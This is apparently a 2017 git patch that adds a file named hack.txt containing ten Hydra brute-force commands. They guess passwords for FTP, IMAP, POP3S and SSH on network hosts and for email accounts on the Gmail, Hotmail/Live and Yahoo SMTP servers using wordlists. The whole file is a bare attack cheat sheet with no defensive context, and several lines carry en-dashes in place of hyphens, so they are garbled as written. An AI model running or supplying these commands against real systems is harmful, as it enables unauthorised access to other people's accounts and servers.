From 3b2537c2298f5f34c12bf45710864d1c4c4813cf Mon Sep 17 00:00:00 2001 From: Simon Rieger Date: Tue, 4 Jul 2017 22:07:21 +0200 Subject: [PATCH] hydra --- hack.txt | 10 ++++++++++ 1 file changed, 10 insertions(+) create mode 100755 hack.txt diff --git a/hack.txt b/hack.txt new file mode 100755 index 0000000..fc7668b --- /dev/null +++ b/hack.txt @@ -0,0 +1,10 @@ +hydra -l user -x 3:3:a ftp://192.168.43.1 +hydra –S –l Email –P /root/Desktop/Wordlist.txt –e ns –V –s 465 smtp.gmail.com smtp +hydra –S –l Email –P /root/Desktop/Wordlist.txt –e ns –V –s 587 smtp.live.com smtp +hydra –S –l Email –P /root/Desktop/Wordlist.txt –e ns –V –s 587 smtp.mail.yahoo.com smtp +hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp +hydra -l user -P passlist.txt ftp://192.168.0.1 +hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN +hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 +hydra -l admin -p password ftp://[192.168.0.0/24]/ +hydra -L logins.txt -P pws.txt -M targets.txt ssh